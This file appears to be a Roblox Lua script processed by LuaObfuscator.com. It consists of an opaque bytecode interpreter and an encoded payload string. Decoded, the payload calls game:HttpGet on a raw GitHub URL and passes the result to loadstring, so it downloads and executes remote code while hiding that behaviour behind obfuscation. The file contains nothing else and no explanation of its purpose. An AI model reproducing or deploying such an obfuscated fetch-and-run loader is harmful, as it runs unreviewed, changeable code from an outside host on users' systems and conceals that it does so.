--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (v17==3) then v23=nil;function v23()local v38=0 + (1807 -(1066 + 741));local v39;local v40;local v41;local v42;while true do if ((0 -0)==v38) then v39,v40,v41,v42=v1(v15,v18,v18 + 3);v18=v18 + 3 + 1;v38=744 -(640 + 103);end if (v38==(931 -(507 + 423))) then return (v42 * 16777216) + (v41 * (10997 + 54539)) + (v40 * (1206 -950)) + v39;end end end v24=nil;v17=4;end if (v17==0) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v30)if (v1(v30,2)==79) then local v66=0;while true do if (v66==0) then v19=v0(v3(v30,1,1));return "";end end else local v67=v2(v0(v30,16));if v19 then local v76=0;local v77;while true do if (v76==0) then v77=v5(v67,v19);v19=nil;v76=1;end if (1==v76) then return v77;end end else return v67;end end end);v17=1;end if (v17==6) then v28=nil;function v28()local v43=1399 -(1075 + 324);local v44;local v45;local v46;local v47;local v48;local v49;while true do local v62=1528 -(487 + 1041);local v63;while true do if (v62==0) then v63=0;while true do if (v63~=(0 + 0)) then else local v93=707 -(652 + 55);while true do if ((0 -0)==v93) then if (v43~=(1 -0)) then else local v98=0 -0;local v99;while true do if (v98~=0) then else v99=0 -0;while true do if (v99==(1218 -(266 + 951))) then v49={};v43=2 -0;break;end if (v99==(1941 -(784 + 1157))) then local v120=0;while true do if (v120==0) then v47={v44,v45,nil,v46};v48=v23();v120=1 + 0;end if (v120~=1) then else v99=1 + 0;break;end end end end break;end end end if (v43~=(5 -3)) then else local v100=1704 -(1440 + 264);local v101;while true do if (v100==(0 + 0)) then v101=0;while true do if (v101==1) then for v122=1 + 0,v23() do local v123=0;local v124;while true do if (v123==0) then v124=v21();if (v20(v124,2 -1,1)==0) then local v137=0 -0;local v138;local v139;local v140;local v141;local v142;while true do if (v137==2) then v142=nil;while true do if (v138==(0 + 0)) then local v149=0;while true do if (1~=v149) then else v138=1;break;end if (v149~=0) then else v139=0;v140=nil;v149=1 + 0;end end end if (v138~=1) then else v141=nil;v142=nil;v138=368 -(120 + 246);end if (v138~=2) then else while true do if (v139==(1 + 0)) then v142={v22(),v22(),nil,nil};if (v140==(0 -0)) then local v155=0;local v156;local v157;while true do if (v155==1) then while true do if (v156==0) then v157=0;while true do if (v157==0) then v142[3 + 0]=v22();v142[77 -(66 + 7)]=v22();break;end end break;end end break;end if (v155==(1411 -(915 + 496))) then v156=0 -0;v157=nil;v155=1;end end elseif (v140==1) then v142[3]=v23();elseif (v140==(2 -0)) then v142[3 + 0]=v23() -(2^(57 -41));elseif (v140==(2 + 1)) then local v161=62 -(18 + 44);local v162;while true do if (v161==0) then v162=0;while true do if (v162==0) then v142[3]=v23() -((937 -(906 + 29))^16);v142[4]=v22();break;end end break;end end end v139=2;end if (v139~=(6 -3)) then else if (v20(v141,3,3)~=(1 -0)) then else v142[6 -2]=v49[v142[4]];end v44[v122]=v142;break;end if (v139==0) then local v152=0;while true do if ((0 -0)==v152) then v140=v20(v124,2,3);v141=v20(v124,4,722 -(338 + 378));v152=1;end if (v152~=(426 -(179 + 246))) then else v139=1;break;end end end if (v139~=(5 -3)) then else local v153=0;local v154;while true do if (v153==0) then v154=0;while true do if (1==v154) then v139=14 -11;break;end if (v154~=(0 -0)) then else if (v20(v141,1 + 0,1)~=1) then else v142[2 -0]=v49[v142[1 + 1]];end if (v20(v141,2,5 -3)==1) then v142[733 -(260 + 470)]=v49[v142[3]];end v154=1;end end break;end end end end break;end end break;end if (v137~=(1543 -(506 + 1036))) then else v140=nil;v141=nil;v137=2;end if ((0 -0)==v137) then v138=0;v139=nil;v137=185 -(91 + 93);end end end break;end end end v43=1178 -(486 + 689);break;end if (v101~=0) then else local v121=0 + 0;while true do if (v121~=(1915 -(986 + 928))) then else v101=1;break;end if (v121~=(0 -0)) then else for v128=1,v48 do local v129=839 -(606 + 233);local v130;local v131;local v132;while true do if (1~=v129) then else v132=nil;while true do if (v130==(2 -1)) then if (v131==(807 -(601 + 205))) then v132=v21()~=0;elseif (v131==2) then v132=v24();elseif (v131==3) then v132=v25();end v49[v128]=v132;break;end if (v130==(1797 -(964 + 833))) then local v148=0 + 0;while true do if (v148==(0 -0)) then v131=v21();v132=nil;v148=1277 -(259 + 1017);end if (v148==(1725 -(1614 + 110))) then v130=1;break;end end end end break;end if (v129==(0 + 0)) then v130=0;v131=nil;v129=1 -0;end end end v47[3]=v21();v121=1;end end end end break;end end end v93=500 -(11 + 488);end if (v93==(1 + 0)) then v63=1;break;end end end if (v63==(1 + 0)) then if (v43~=(8 -5)) then else local v96=0 + 0;while true do if (v96==(1405 -(1179 + 225))) then return v47;end if (v96~=0) then else for v102=1,v23() do v45[v102-(1 + 0)]=v28();end for v104=1,v23() do v46[v104]=v23();end v96=3 -2;end end end if (v43==0) then v44={};v45={};v46={};v43=868 -(723 + 144);end break;end end break;end end end end v29=nil;v17=7;end if (v17==7) then function v29(v31,v32,v33)local v50=v31[1];local v51=v31[2];local v52=v31[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v11("#",...) -1;local function v72()local v78=v50;local v79=Const;local v80=v51;local v81=v52;local v82=v27;local v83={};local v84={};local v85={};for v90=0 -0,v71 do if ((v90>=v81) or ((4102 -(783 + (1270 -(474 + 133))))<1247)) then v83[v90-v81]=v70[v90 + 1 + 0];else v85[v90]=v70[v90 + 1 + 0];end end local v86=(v71-v81) + (1 -0);local v87;local v88;while true do local v91=0 + 0;local v92;while true do if (((1538 + 537)<4610) and (v91==(0 -0))) then v92=0;while true do if (((858 + 1699)>(2483 -1793)) and (v92==(0 -0))) then local v97=0 + 0;while true do if (((6751 -3846)==(11529 -8624)) and (v97==(41 -(30 + 11)))) then v87=v78[v68];v88=v87[(909 -(209 + 699)) + 0];v97=1 + 0;end if ((((286 -193) + 98)<(3081 -1295)) and (v97==(1 + 0))) then v92=1054 -(163 + 890);break;end end end if ((v92==(1 + 0)) or ((2023 -(687 + 475))>=((1919 + 1094) -(21 + 251)))) then if (((15922 -11178)>((3590 + 2196) -(68 + 1688))) and (v88<=(1086 -(32 + 1052)))) then if ((v88<=((1660 -(190 + 1470)) + 0)) or ((1688 + 3189)<=(1112 + 2034))) then do return;end elseif (((30 + 1033)<(2291 + 2623)) and (v88>(2 -(1487 -(644 + 842))))) then v85[v87[481 -(435 + (920 -(561 + 315)))]]=v33[v87[3 + (0 -0)]];else v85[v87[2 + 0]]=v87[3];end elseif (((302 + 72)<4011) and (v88<=(2 + 2))) then if (((1814 -(1108 + 429))<=(11486 -7489)) and (v88==3)) then v85[v87[619 -(260 + 357)]]();else local v108=723 -(157 + 566);local v109;local v110;local v111;local v112;local v113;while true do if ((v108==(1043 -(331 + 710))) or (3739<=2216)) then v113=nil;while true do if ((v109==1) or (378>(3318 + (2810 -2116)))) then v69=(v112 + v110) -(1 + 0);v113=1826 -(654 + 1172);v109=771 -(464 + 305);end if (((1285 -(951 + 334))==v109) or (2992>4494)) then local v133=0 + 0;while true do if (((700 -166)<(3276 + 1230)) and (v133==(1 -0))) then v109=1;break;end if (((3021 -(376 + 68))<=(8918 -5615)) and (v133==0)) then v110=v87[2 -0];v111,v112=v82(v85[v110](v12(v85,v110 + (1 -0),v87[1 + 2])));v133=1;end end end if ((v109==2) or (((2223 + 1176) -(674 + 403))<(2644 -(1593 + 146 + 78)))) then for v143=v110,v69 do local v144=0 -(0 + 0);local v145;while true do if (((4292 -(515 + (1610 -(724 + 825))))==(11105 -7389)) and (v144==(0 + (989 -(833 + 156))))) then v145=0 -0;while true do if ((((16793 -11153) -3829)>=(2002 -(924 + 77))) and (v145==(0 + 0))) then v113=v113 + (1 -0);v85[v143]=v111[v113];break;end end break;end end end break;end end break;end if ((v108==(742 -(175 + 566))) or ((1202 + 2807)==((1983 -(522 + 397)) + 3375))) then v111=nil;v112=nil;v108=137 -((150 -76) + 61);end if ((v108==0) or (4656<(3570 + 911))) then v109=889 -(637 + 252);v110=nil;v108=1 + 0;end end end elseif (((4428 -(361 + 940))>=(2875 -(69 + 1250))) and (v88==5)) then local v114=187 -(24 + 163);local v115;while true do if ((v114==0) or ((2525 -1398)<((1426 + 967) -(778 + 649)))) then v115=v87[2 + 0];v85[v115]=v85[v115](v12(v85,v115 + 1,v69));break;end end else local v116=0 + 0;local v117;local v118;local v119;while true do if ((v116==(0 + (59 -(30 + 29)))) or ((1735 -(1078 + 150))==(1855 -(818 + (6 -1))))) then local v126=1373 -(340 + 1033);while true do if (((4249 -(1505 + 320))==2424) and (v126==(0 -0))) then v117=1549 -(632 + 917);v118=nil;v126=1 -0;end if ((437<=(3338 -(427 + 137))) and (v126==(1 + (926 -(875 + 51))))) then v116=113 -(66 + 46);break;end end end if ((v116==1) or (1955>=((11907 -7846) -(832 + 110)))) then v119=nil;while true do if ((4572==(5697 -(499 + 626))) and (v117==(588 -(149 + 438)))) then v85[v118 + 1]=v119;v85[v118]=v119[v87[8 -4]];break;end if (((1419 -1133)==286) and (v117==(701 -(339 + 362)))) then local v136=0;while true do if (((6189 -(4804 -(183 + 1072)))==((11594 -(187 + 339)) -8428)) and (v136==(443 -(298 + 144)))) then v117=1 -0;break;end if (((10822 -6966)>=(77 + 181)) and (v136==((0 -0) -0))) then local v146=(0 -0) + 0;while true do if ((v146==(493 -(401 + 91))) or (4330>=(3807 + 675))) then v136=1 + 0 + 0;break;end if ((1036>(191 + 124)) and (v146==0)) then v118=v87[1954 -(9 + 1943)];v119=v85[v87[3 + 0]];v146=(1900 -(341 + 327)) -(1173 + 58);end end end end end end break;end end end v68=v68 + (2 -1);break;end end break;end end end end A,B=v27(v10(v72));if  not A[1] then local v89=v31[4][v68] or "?";error("Script error at ["   .. v89   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end return v29(v28(),{},v16)();end if (v17==1) then v20=nil;function v20(v34,v35,v36)if v36 then local v73=(v34/((1 + 1)^(v35-(1 + 0))))%(2^(((v36-(1 + 0 + 0)) -(v35-(1 + (0 -0)))) + (1801 -((2506 -1754) + 1048))));return v73-(v73%((1596 -(467 + 133)) -(904 + 91)));else local v74=0;local v75;while true do if (v74==(0 -0)) then v75=(893 -((1909 -(1402 + 125)) + 509))^(v35-1);return (((v34%(v75 + v75))>=v75) and 1) or (0 + 0);end end end end v21=nil;v17=2;end if (v17==2) then function v21()local v53=1762 -(837 + 925);local v54;while true do if ((1610 -(92 + 1518))==v53) then v54=v1(v15,v18,v18);v18=v18 + (3 -2);v53=2 -1;end if ((1 -(0 -0))==v53) then return v54;end end end v22=nil;function v22()local v55=0 + 0;local v56;local v57;while true do if (v55==(1 + 0)) then return (v57 * (696 -(97 + 343))) + v56;end if (v55==(1765 -(608 + 1157))) then v56,v57=v1(v15,v18,v18 + 1 + 1);v18=v18 + 2;v55=1 + (121 -(120 + 1));end end end v17=3;end if (5==v17) then v26=v23;v27=nil;function v27(...)return {...},v11("#",...);end v17=6;end if (v17==4) then function v24()local v58=v23();local v59=v23();return (( -(5 -3) * v20(v59,1364 -(63 + 1269))) + (902 -((1104 -521) + 318))) * (2^(v20(v59,1687 -(1163 + 503),20 + 11) -(2667 -(6115 -4471)))) * ((((v20(v59,1250 -(1185 + 64),4 + 16) * ((1 + 1)^(15 + 17))) + v58)/((1 + 1)^(109 -57))) + 1);end v25=nil;function v25(v37)local v60;if  not v37 then v37=v23();if (v37==0) then return "";end end v60=v3(v15,v18,(v18 + v37) -(1 + 0));v18=v18 + v37;local v61={};for v64=1 + 0, #v60 do v61[v64]=v2(v1(v3(v60,v64,v64)));end return v6(v61);end v17=5;end end end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F636C69636B636C69636B706F772F706C732F6D61696E2F67726F757000083O0012023O00013O001202000100023O002006000100010003001201000300044O0004000100034O00055O00022O00033O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8());end
